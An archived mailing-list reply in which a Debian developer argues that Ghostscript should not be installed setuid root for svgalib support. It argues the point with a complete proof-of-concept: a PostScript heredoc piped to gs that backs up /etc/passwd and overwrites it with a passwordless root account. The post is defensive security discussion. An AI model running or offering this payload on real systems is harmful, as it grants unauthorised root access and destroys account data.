[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: gs shouldn't depend on svgalib



> 
> joost witteveen writes:
> 
> >However, if it proves to be really easy to modify the gs svga code,
> >I'll make it give up it's setuid root privileges there (that would be
> >best, but also the most work (if any work is needed in the first
> >place -- maybe the code already does this)).
> 
> vga_init() does indeed already give up the root permissions, like
> this:

vga_init does -- but that's not all I need. This would mean gs would ONLY
give up it's root privileges if the output goes to svgalib. All a
hacker would need to do is:

cat <<EOF |gs -sDEVICE=ppm
%!PS
(/etc/passwd) (r) file /passwd exch def
(/etc/passwd.old) (w) file /passwdb exch def
/s (hello)  def
{passwd s readstring
{passwdb s writestring pop} 
{passwdb s writestring pop exit} ifelse
} loop

passwdb closefile
passwdb closefile
(/etc/passwd) (w) file /passwd exch def
passwd (root::0:0:root:/root:/bin/bash\012) writestring
passwd closefile
EOF

and gs will not give up it's root privileges, and happily modify
/etc/passwd. I also need some way to determine whether gs will
call vga_init() to surrender it's root privileges. At the moment
the wrapper I sent to the list does this, but a good hacker will probably
not find it hard to get around this.

For this reason, I think the best thing to do is to simply make gs
(or the wrapper) NOT setuid by default, but only allow a local
sysadmin to make it so (thereby giving up (some) security, but this
is for local systems often not too bad).

> Basically the first thing gs (and indeed any svgalib program) should
> do is call vga_init or surrender root permissions by some other means.
> If there's a situation in which it doesn't do this then it's a bug!

But then I have to modify more in gs (not just the svga part).
As I said, I don't really like doing this (and having to modify this
in next releases, ..).

> 
> >>What we really need is some kernel support for graphics cards...
> >We've got X, of cource -- I see svgalib only for the die-hards.
> 
> Having grown up on much smaller computers I find direct access to the
> display hardware has a certain charm l-)

But then you maybe also think having direct acces to other system resources
(/dev/hda1, ...) hase some charm. In short, I do think svgalib
should be usable, and I do want to go some way to keep your system
somewhat secure, but I don't want to rewrite the gs initialisation
code just for those who want to use gs-svga, and have a secure system.

-- 
joost witteveen
            joost@rulcmc.leidenuniv.nl
          joostje@debian.org
--
Use Debian Linux!


Reply to: